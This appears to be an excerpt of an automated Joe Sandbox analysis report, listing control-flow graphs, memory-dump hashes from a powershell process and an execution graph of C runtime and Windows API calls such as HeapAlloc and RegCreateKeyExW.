                                                                                                                                                                                                                                  control_flow_graph 780 7ffaacc51b5d-7ffaacc51b61 781 7ffaacc51bbf-7ffaacc51bc6 780->781 782 7ffaacc51b64-7ffaacc51b69 780->782 784 7ffaacc51bf1-7ffaacc51c19 781->784 785 7ffaacc51bc8-7ffaacc51bef 781->785 782->781 791 7ffaacc51c1b 784->791 792 7ffaacc51c1c-7ffaacc51c2d 784->792 785->784 791->792 793 7ffaacc51c2f 792->793 794 7ffaacc51c30-7ffaacc51cca 792->794 793->794 797 7ffaacc51cd0-7ffaacc51cda 794->797 798 7ffaacc51ec1-7ffaacc51f8a 794->798 799 7ffaacc51cdc-7ffaacc51cf1 797->799 800 7ffaacc51cf3-7ffaacc51cf8 797->800 799->800 802 7ffaacc51cfe-7ffaacc51d01 800->802 803 7ffaacc51e61-7ffaacc51e6b 800->803 807 7ffaacc51d18-7ffaacc51d1c 802->807 808 7ffaacc51d03-7ffaacc51d0c 802->808 805 7ffaacc51e7c-7ffaacc51ebe 803->805 806 7ffaacc51e6d-7ffaacc51e7b 803->806 805->798 807->803 814 7ffaacc51d22-7ffaacc51d26 807->814 808->807 814->798 817 7ffaacc51d2c-7ffaacc51d36 814->817 818 7ffaacc51d38-7ffaacc51d50 817->818 819 7ffaacc51d52-7ffaacc51d62 817->819 818->819 819->803 825 7ffaacc51d68-7ffaacc51d99 819->825 825->803 836 7ffaacc51d9f-7ffaacc51dcb 825->836 841 7ffaacc51dcd-7ffaacc51df4 836->841 842 7ffaacc51df6 836->842 843 7ffaacc51df8-7ffaacc51dfa 841->843 842->843 843->803 845 7ffaacc51dfc-7ffaacc51e02 843->845 846 7ffaacc51e21-7ffaacc51e25 845->846 847 7ffaacc51e04-7ffaacc51e1f 845->847 850 7ffaacc51e2a-7ffaacc51e33 846->850 847->846 852 7ffaacc51e4c-7ffaacc51e60 850->852 853 7ffaacc51e35-7ffaacc51e42 850->853 853->852 855 7ffaacc51e44-7ffaacc51e4a 853->855 855->852
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 79ece82aeb28da5b9bed18a00d033b3d7fd82ffedf4a6650b9561635086269aa
                                                                                                                                                                                                                                  • Instruction ID: e14b94c3017e2810cb43127b90c1f3c3ccf82eeaf6b4b4ecb10b3920a0894603
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79ece82aeb28da5b9bed18a00d033b3d7fd82ffedf4a6650b9561635086269aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D11761A5EB8D5FEB56AB3888595B57BE0EF57211B0401FFD08EC7093EA14EC09C391

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 857 7ffaacc58ac5-7ffaacc58b54 861 7ffaacc58b5a-7ffaacc58b64 857->861 862 7ffaacc58dbc-7ffaacc58e7b 857->862 863 7ffaacc58b7d-7ffaacc58b82 861->863 864 7ffaacc58b66-7ffaacc58b73 861->864 867 7ffaacc58d60-7ffaacc58d6a 863->867 868 7ffaacc58b88-7ffaacc58b8b 863->868 864->863 871 7ffaacc58b75-7ffaacc58b7b 864->871 872 7ffaacc58d6c-7ffaacc58d78 867->872 873 7ffaacc58d79-7ffaacc58db9 867->873 869 7ffaacc58b8d-7ffaacc58ba0 868->869 870 7ffaacc58ba2 868->870 875 7ffaacc58ba4-7ffaacc58ba6 869->875 870->875 871->863 873->862 875->867 878 7ffaacc58bac-7ffaacc58be0 875->878 893 7ffaacc58bf7 878->893 894 7ffaacc58be2-7ffaacc58bf5 878->894 896 7ffaacc58bf9-7ffaacc58bfb 893->896 894->896 896->867 897 7ffaacc58c01-7ffaacc58c09 896->897 897->862 899 7ffaacc58c0f-7ffaacc58c19 897->899 900 7ffaacc58c1b-7ffaacc58c33 899->900 901 7ffaacc58c35-7ffaacc58c45 899->901 900->901 901->867 905 7ffaacc58c4b-7ffaacc58c7c 901->905 905->867 911 7ffaacc58c82-7ffaacc58cae 905->911 916 7ffaacc58cb0-7ffaacc58cd7 911->916 917 7ffaacc58cd9 911->917 918 7ffaacc58cdb-7ffaacc58cdd 916->918 917->918 918->867 920 7ffaacc58ce3-7ffaacc58ceb 918->920 921 7ffaacc58cfb 920->921 922 7ffaacc58ced-7ffaacc58cf7 920->922 926 7ffaacc58d00-7ffaacc58d15 921->926 923 7ffaacc58d17-7ffaacc58d46 922->923 924 7ffaacc58cf9 922->924 931 7ffaacc58d4d-7ffaacc58d5f 923->931 924->926 926->923
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 78d43dee4dd9f059bf6c14fa29b30be6fd807fda9708f8b3ead0d51b7be9350f
                                                                                                                                                                                                                                  • Instruction ID: a2bf922947e1eadf96f6dbc20c97472da2a44c86af4fc6bf44eefd863900559a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78d43dee4dd9f059bf6c14fa29b30be6fd807fda9708f8b3ead0d51b7be9350f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6D128A2D9EA8E8FF765AB6888155B57BE0EF56311F0801FED04DC70D3DA18E909C391

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 963 7ffaacc51d10-7ffaacc51d1c 965 7ffaacc51e61-7ffaacc51e6b 963->965 966 7ffaacc51d22-7ffaacc51d26 963->966 967 7ffaacc51e7c-7ffaacc51ebe 965->967 968 7ffaacc51e6d-7ffaacc51e7b 965->968 969 7ffaacc51ec1-7ffaacc51f8a 966->969 970 7ffaacc51d2c-7ffaacc51d36 966->970 967->969 972 7ffaacc51d38-7ffaacc51d50 970->972 973 7ffaacc51d52-7ffaacc51d62 970->973 972->973 973->965 979 7ffaacc51d68-7ffaacc51d99 973->979 979->965 992 7ffaacc51d9f-7ffaacc51dcb 979->992 999 7ffaacc51dcd-7ffaacc51df4 992->999 1000 7ffaacc51df6 992->1000 1001 7ffaacc51df8-7ffaacc51dfa 999->1001 1000->1001 1001->965 1003 7ffaacc51dfc-7ffaacc51e02 1001->1003 1004 7ffaacc51e21-7ffaacc51e25 1003->1004 1005 7ffaacc51e04-7ffaacc51e1f 1003->1005 1008 7ffaacc51e2a-7ffaacc51e33 1004->1008 1005->1004 1010 7ffaacc51e4c-7ffaacc51e60 1008->1010 1011 7ffaacc51e35-7ffaacc51e42 1008->1011 1011->1010 1013 7ffaacc51e44-7ffaacc51e4a 1011->1013 1013->1010
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f6dce3e10d130ab5c1c9495ccd54d7ec2d0ec9624733b5a0edf5137df2690ca6
                                                                                                                                                                                                                                  • Instruction ID: 6d97d2815410cb70196ab11a7df86d10949e2d43d5e8b957262f087e3921980d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6dce3e10d130ab5c1c9495ccd54d7ec2d0ec9624733b5a0edf5137df2690ca6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D41E861B5EA8A8FFB96EB2C84AD5796AD1EF56311B4840FED44EC7193DD18DC0883C0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 989c11eb01e8be7b2d01ade639d2a094b6732eee406f2309543b96fee73c1783
                                                                                                                                                                                                                                  • Instruction ID: 09424d63b1d86ff1a4d9ff4594061d077a5f30e08874540082c8ee0543ccaed5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 989c11eb01e8be7b2d01ade639d2a094b6732eee406f2309543b96fee73c1783
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48213A53E5FB495FF3A55B2C68160752AC1DF82692B4C41BED04DC31D3ED18EC0982C5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: H$mL_H$/
                                                                                                                                                                                                                                  • API String ID: 0-3259534974
                                                                                                                                                                                                                                  • Opcode ID: 681e194a210e85cc92e9155a6251038965f03bbb304f58c3dfb6ae640423f9fa
                                                                                                                                                                                                                                  • Instruction ID: 859393d3f7ce5ccb6c78dd02150fa7a705661b4e66ce7425334751101071afb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681e194a210e85cc92e9155a6251038965f03bbb304f58c3dfb6ae640423f9fa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A32D570A1CA598FEB94EB2CC455A797BE1FF59300F0441B9E40EC72A6DF2AEC458781
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_I$sK_^
                                                                                                                                                                                                                                  • API String ID: 0-458045039
                                                                                                                                                                                                                                  • Opcode ID: ea214e178912eae12990d5e48bb9e2c985ffbac01af754ee58779b448e0b90a1
                                                                                                                                                                                                                                  • Instruction ID: 9b7b165d643c4ed1fd99bf746c966ff6062ff44b200de684fb2e30abfb67b5be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea214e178912eae12990d5e48bb9e2c985ffbac01af754ee58779b448e0b90a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5522C4A0A1DA558FF758AB28D45667973D2FF9A710F44817DE04EC32C3DE2AE80687C1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: gK_H
                                                                                                                                                                                                                                  • API String ID: 0-3193895614
                                                                                                                                                                                                                                  • Opcode ID: 34620ac652bbf1e9cf0c6812d982b82a9471869b65141950143c0de0a467857e
                                                                                                                                                                                                                                  • Instruction ID: 2f56cff14d22019b73412a7a8883ee89c47c5dce1a4923658cb7af08e6be49a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34620ac652bbf1e9cf0c6812d982b82a9471869b65141950143c0de0a467857e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D12A270A1DB568FE7A8DB1CC4456BA77D1EB99710F10867EC08DC3292DE35E8468782
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cfd70acb019814ff5082e0da1d86e0385cbb883a97ef890db585b54d932b4073
                                                                                                                                                                                                                                  • Instruction ID: bf7d7bfae7feadae75167199b8bf00949cb9bee6d897d6980f564d7c862f5651
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd70acb019814ff5082e0da1d86e0385cbb883a97ef890db585b54d932b4073
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EC1026190EB898FE7569B3C98565B57FE0EF57211B0941FED08DC70A3EA18EC0AC391
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9315fe9a84eeec87436ce17946029a8e9a02002a9f696ae50617681c65ea0ab6
                                                                                                                                                                                                                                  • Instruction ID: e78612d2ef7fc0eeb4a970cce35b15d53e7b421b4ed56dc989c936bd800e7177
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9315fe9a84eeec87436ce17946029a8e9a02002a9f696ae50617681c65ea0ab6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5091CF7190C7858FD3599F28D814666BBE0EF8A314F0485BFF48DC72A2DB399880C782
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f69fc8c7d691a443c1984cbe2fb706f92d13fb493ad5f9ce5a31304fe9f1b950
                                                                                                                                                                                                                                  • Instruction ID: 435a79c97c7297f6df5019dbf0c212b79b98a30e8a81e408e7baecf131d7852c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f69fc8c7d691a443c1984cbe2fb706f92d13fb493ad5f9ce5a31304fe9f1b950
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F81C17190C7858FD3589F28D854666BBE0FF8A314F0485BFF48DC32A2DA359984C782
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4114a5304bea6e7e6c1b682a976a4648c980acf3188404a68a61d4df1d9a1656
                                                                                                                                                                                                                                  • Instruction ID: 2da86629db2d044575954f2285fb2fcd8bd25e3b364cefc5be5c1d9afeef9a5a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4114a5304bea6e7e6c1b682a976a4648c980acf3188404a68a61d4df1d9a1656
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4141B39294EBC98FF3A69B2848691616FA0EF93151B4941FEC0CDCB1D3D80D9C4E9391

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:3.3%
                                                                                                                                                                                                                                  Total number of Nodes:486
                                                                                                                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                                                                                                                  execution_graph 13642 14001d464 13643 14001d49d 13642->13643 13645 14001d473 13642->13645 13645->13643 13646 14001cd24 13645->13646 13647 14001b004 _getptd 45 API calls 13646->13647 13649 14001cd2d 13647->13649 13651 140020110 13649->13651 13652 14002012a 13651->13652 13653 140020120 13651->13653 13655 14002013e 13652->13655 13661 14001cf64 13652->13661 13654 14001c7e8 _FF_MSGBANNER 45 API calls 13653->13654 13654->13652 13657 140020147 RtlCaptureContext 13655->13657 13658 1400201a6 13655->13658 13659 1400174b0 __initmbctable 13657->13659 13660 140020167 SetUnhandledExceptionFilter UnhandledExceptionFilter 13659->13660 13660->13658 13662 14001cfea DecodePointer 13661->13662 13663 14001cf90 13661->13663 13667 14001d040 13662->13667 13663->13662 13665 14001d03b 13663->13665 13668 14001cfb4 13663->13668 13666 14001af80 _errno 45 API calls 13665->13666 13666->13667 13669 1400192e0 _lock 45 API calls 13667->13669 13671 14001d0df 13667->13671 13677 14001cfe2 13667->13677 13668->13662 13670 14001cfc3 13668->13670 13669->13671 13672 14001a218 _errno 45 API calls 13670->13672 13676 14001d131 13671->13676 13679 14001ae90 EncodePointer 13671->13679 13673 14001cfc8 13672->13673 13674 14001a148 _flush 7 API calls 13673->13674 13674->13677 13676->13677 13680 1400191e0 LeaveCriticalSection 13676->13680 13677->13655 9406 1400181f8 9428 1400192e0 9406->9428 9429 1400192fe 9428->9429 9430 14001930f EnterCriticalSection 9428->9430 9434 1400191f8 9429->9434 9435 140019236 9434->9435 9436 14001921f 9434->9436 9448 14001924b 9435->9448 9510 140018ca4 9435->9510 9465 14001ca10 9436->9465 9442 140019261 9515 14001a218 9442->9515 9443 140019270 9446 1400192e0 _lock 44 API calls 9443->9446 9449 14001927a 9446->9449 9448->9430 9460 14001803c 9448->9460 9450 1400192b2 9449->9450 9451 140019283 9449->9451 9452 140018e1c free 44 API calls 9450->9452 9518 14001d1f0 InitializeCriticalSectionAndSpinCount 9451->9518 9454 1400192a1 LeaveCriticalSection 9452->9454 9454->9448 9458 14001929c 9459 14001a218 _errno 44 API calls 9458->9459 9459->9454 9461 14001ca10 _FF_MSGBANNER 44 API calls 9460->9461 9462 140018049 9461->9462 9463 14001c7e8 _FF_MSGBANNER 44 API calls 9462->9463 9464 140018050 DecodePointer 9463->9464 9526 14002006c 9465->9526 9467 14001ca1e 9468 14001ca2d 9467->9468 9469 14002006c _FF_MSGBANNER 45 API calls 9467->9469 9470 14001c7e8 _FF_MSGBANNER 45 API calls 9468->9470 9472 140019224 9468->9472 9469->9468 9471 14001ca44 9470->9471 9473 14001c7e8 _FF_MSGBANNER 45 API calls 9471->9473 9474 14001c7e8 9472->9474 9473->9472 9475 14001c80b 9474->9475 9476 14001922c 9475->9476 9477 14002006c _FF_MSGBANNER 42 API calls 9475->9477 9507 1400180a8 9476->9507 9478 14001c82d 9477->9478 9479 14001c9b2 GetStdHandle 9478->9479 9480 14002006c _FF_MSGBANNER 42 API calls 9478->9480 9479->9476 9481 14001c9c5 _FF_MSGBANNER 9479->9481 9482 14001c840 9480->9482 9481->9476 9484 14001c9db WriteFile 9481->9484 9482->9479 9483 14001c851 9482->9483 9483->9476 9545 14001fa14 9483->9545 9484->9476 9487 14001c895 GetModuleFileNameA 9488 14001c8b5 9487->9488 9493 14001c8e6 _FF_MSGBANNER 9487->9493 9490 14001fa14 _FF_MSGBANNER 42 API calls 9488->9490 9489 14001a020 _FF_MSGBANNER 6 API calls 9489->9487 9491 14001c8cd 9490->9491 9491->9493 9495 14001a020 _FF_MSGBANNER 6 API calls 9491->9495 9492 14001c941 9563 14001f8b0 9492->9563 9493->9492 9554 14001f93c 9493->9554 9495->9493 9497 14001c96c 9500 14001f8b0 _FF_MSGBANNER 42 API calls 9497->9500 9499 14001a020 _FF_MSGBANNER 6 API calls 9499->9497 9502 14001c982 9500->9502 9503 14001c99b 9502->9503 9505 14001a020 _FF_MSGBANNER 6 API calls 9502->9505 9572 14001fe78 9503->9572 9504 14001a020 _FF_MSGBANNER 6 API calls 9504->9492 9505->9503 9590 14001806c GetModuleHandleW 9507->9590 9511 140018cc0 9510->9511 9513 140018cf8 9511->9513 9514 140018cd8 Sleep 9511->9514 9594 14001da14 9511->9594 9513->9442 9513->9443 9514->9511 9514->9513 9608 14001af80 GetLastError FlsGetValue 9515->9608 9517 14001a221 9517->9448 9519 140019290 9518->9519 9519->9454 9520 140018e1c 9519->9520 9521 140018e21 HeapFree 9520->9521 9525 140018e51 realloc 9520->9525 9522 140018e3c 9521->9522 9521->9525 9523 14001a218 _errno 43 API calls 9522->9523 9524 140018e41 GetLastError 9523->9524 9524->9525 9525->9458 9528 140020074 9526->9528 9527 14002007e 9527->9467 9528->9527 9529 14001a218 _errno 45 API calls 9528->9529 9530 140020099 9529->9530 9532 14001a148 DecodePointer 9530->9532 9533 14001a193 write_char 9532->9533 9534 14001a179 9532->9534 9536 14001a020 9533->9536 9534->9527 9543 1400174b0 9536->9543 9538 14001a040 RtlCaptureContext 9539 14001a07d 9538->9539 9540 14001a0dd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9539->9540 9541 14001a128 GetCurrentProcess TerminateProcess 9540->9541 9542 14001a11c write_char 9540->9542 9541->9534 9542->9541 9544 1400174b9 9543->9544 9544->9538 9544->9544 9547 14001fa1f 9545->9547 9549 14001fa29 9545->9549 9546 14001a218 _errno 45 API calls 9548 14001fa31 9546->9548 9547->9549 9552 14001fa55 9547->9552 9550 14001a148 _flush 7 API calls 9548->9550 9549->9546 9551 14001c87c 9550->9551 9551->9487 9551->9489 9552->9551 9553 14001a218 _errno 45 API calls 9552->9553 9553->9548 9558 14001f94a 9554->9558 9555 14001f94f 9556 14001c928 9555->9556 9557 14001a218 _errno 45 API calls 9555->9557 9556->9492 9556->9504 9559 14001f979 9557->9559 9558->9555 9558->9556 9561 14001f99d 9558->9561 9560 14001a148 _flush 7 API calls 9559->9560 9560->9556 9561->9556 9562 14001a218 _errno 45 API calls 9561->9562 9562->9559 9564 14001f8c8 9563->9564 9566 14001f8be 9563->9566 9565 14001a218 _errno 45 API calls 9564->9565 9571 14001f8d0 9565->9571 9566->9564 9568 14001f90c 9566->9568 9567 14001a148 _flush 7 API calls 9569 14001c953 9567->9569 9568->9569 9570 14001a218 _errno 45 API calls 9568->9570 9569->9497 9569->9499 9570->9571 9571->9567 9589 14001ae90 EncodePointer 9572->9589 9591 140018086 GetProcAddress 9590->9591 9592 14001809f ExitProcess 9590->9592 9591->9592 9593 14001809b 9591->9593 9593->9592 9595 14001daa8 realloc 9594->9595 9603 14001da2c realloc 9594->9603 9597 14001a218 _errno 44 API calls 9595->9597 9596 14001da64 HeapAlloc 9598 14001da9d 9596->9598 9596->9603 9597->9598 9598->9511 9599 14001ca10 _FF_MSGBANNER 44 API calls 9607 14001da44 9599->9607 9600 14001da8d 9601 14001a218 _errno 44 API calls 9600->9601 9604 14001da92 9601->9604 9602 14001c7e8 _FF_MSGBANNER 44 API calls 9602->9607 9603->9596 9603->9600 9603->9604 9603->9607 9606 14001a218 _errno 44 API calls 9604->9606 9605 1400180a8 malloc 3 API calls 9605->9607 9606->9598 9607->9596 9607->9599 9607->9602 9607->9605 9609 14001afa6 9608->9609 9610 14001afee SetLastError 9608->9610 9620 140018d10 9609->9620 9610->9517 9613 14001afbb FlsSetValue 9614 14001afd1 9613->9614 9615 14001afe7 9613->9615 9625 14001aecc 9614->9625 9617 140018e1c free 40 API calls 9615->9617 9619 14001afec 9617->9619 9619->9610 9621 140018d35 9620->9621 9623 140018d75 9621->9623 9624 140018d53 Sleep 9621->9624 9634 14001dacc 9621->9634 9623->9610 9623->9613 9624->9621 9624->9623 9626 1400192e0 _lock 45 API calls 9625->9626 9627 14001af21 9626->9627 9643 1400191e0 LeaveCriticalSection 9627->9643 9635 14001dae1 9634->9635 9641 14001db13 realloc 9634->9641 9636 14001daef 9635->9636 9635->9641 9638 14001a218 _errno 44 API calls 9636->9638 9637 14001db2b HeapAlloc 9637->9641 9642 14001db0f 9637->9642 9639 14001daf4 9638->9639 9640 14001a148 _flush 7 API calls 9639->9640 9640->9642 9641->9637 9641->9642 9642->9621 9644 140018808 9645 140018820 9644->9645 9684 14001d914 HeapCreate 9645->9684 9648 1400188ae 9687 14001b160 9648->9687 9649 140018895 9652 14001ca10 _FF_MSGBANNER 45 API calls 9649->9652 9650 14001889a 9653 14001c7e8 _FF_MSGBANNER 45 API calls 9650->9653 9652->9650 9655 1400188a4 9653->9655 9657 1400180a8 malloc 3 API calls 9655->9657 9657->9648 9685 14001d938 HeapSetInformation 9684->9685 9686 140018888 9684->9686 9685->9686 9686->9648 9686->9649 9686->9650 9851 1400183bc 9687->9851 9863 14001ae90 EncodePointer 9851->9863 13310 14001b028 13311 14001b031 13310->13311 13339 14001b152 13310->13339 13312 14001b04c 13311->13312 13313 140018e1c free 45 API calls 13311->13313 13314 14001b05a 13312->13314 13315 140018e1c free 45 API calls 13312->13315 13313->13312 13316 14001b068 13314->13316 13317 140018e1c free 45 API calls 13314->13317 13315->13314 13318 14001b076 13316->13318 13320 140018e1c free 45 API calls 13316->13320 13317->13316 13319 14001b084 13318->13319 13321 140018e1c free 45 API calls 13318->13321 13322 14001b092 13319->13322 13323 140018e1c free 45 API calls 13319->13323 13320->13318 13321->13319 13324 14001b0a3 13322->13324 13325 140018e1c free 45 API calls 13322->13325 13323->13322 13326 14001b0bb 13324->13326 13327 140018e1c free 45 API calls 13324->13327 13325->13324 13328 1400192e0 _lock 45 API calls 13326->13328 13327->13326 13331 14001b0c5 13328->13331 13329 14001b0f3 13342 1400191e0 LeaveCriticalSection 13329->13342 13331->13329 13333 140018e1c free 45 API calls 13331->13333 13333->13329 12024 14000e4b0 12025 14000e4d3 12024->12025 12026 14000e4f9 12024->12026 12027 140016e78 _snwprintf_s 77 API calls 12025->12027 12028 140016e78 _snwprintf_s 77 API calls 12026->12028 12029 14000e4f7 12027->12029 12028->12029 12030 14000e552 12029->12030 12031 14000e524 12029->12031 12033 14000e5c4 RegOpenKeyExW 12030->12033 12034 14000e55a RegCreateKeyExW 12030->12034 12032 140007160 3 API calls 12031->12032 12044 14000e54b 12032->12044 12036 14000e5ea GetLastError 12033->12036 12033->12044 12035 14000e594 GetLastError 12034->12035 12034->12044 12037 140006fa0 83 API calls 12035->12037 12038 140006fa0 83 API calls 12036->12038 12040 14000e5a1 12037->12040 12038->12040 12039 140017480 write_char 8 API calls 12041 14000e620 12039->12041 12043 140007160 3 API calls 12040->12043 12043->12044 12044->12039 13423 140021043 13426 1400191e0 LeaveCriticalSection 13423->13426 14127 1400190c4 14128 140018fd0 14127->14128 14129 1400192e0 _lock 45 API calls 14128->14129 14135 140018ff9 14129->14135 14130 140019096 14147 1400191e0 LeaveCriticalSection 14130->14147 14133 140016d44 46 API calls 14133->14135 14134 140016dcc 2 API calls 14134->14135 14135->14130 14135->14133 14135->14134 14137 140018f88 14135->14137 14138 140018f96 14137->14138 14139 140018f9d 14137->14139 14148 140018fd0 14138->14148 14141 140018f0c _flush 77 API calls 14139->14141 14143 140018fa2 14141->14143 14142 140018f9b 14142->14135 14143->14142 14144 14001864c _flush 45 API calls 14143->14144 14145 140018fba 14144->14145 14157 14001e5e8 14145->14157 14149 1400192e0 _lock 45 API calls 14148->14149 14155 140018ff9 14149->14155 14150 140019096 14183 1400191e0 LeaveCriticalSection 14150->14183 14153 140016d44 46 API calls 14153->14155 14154 140016dcc 2 API calls 14154->14155 14155->14150 14155->14153 14155->14154 14156 140018f88 81 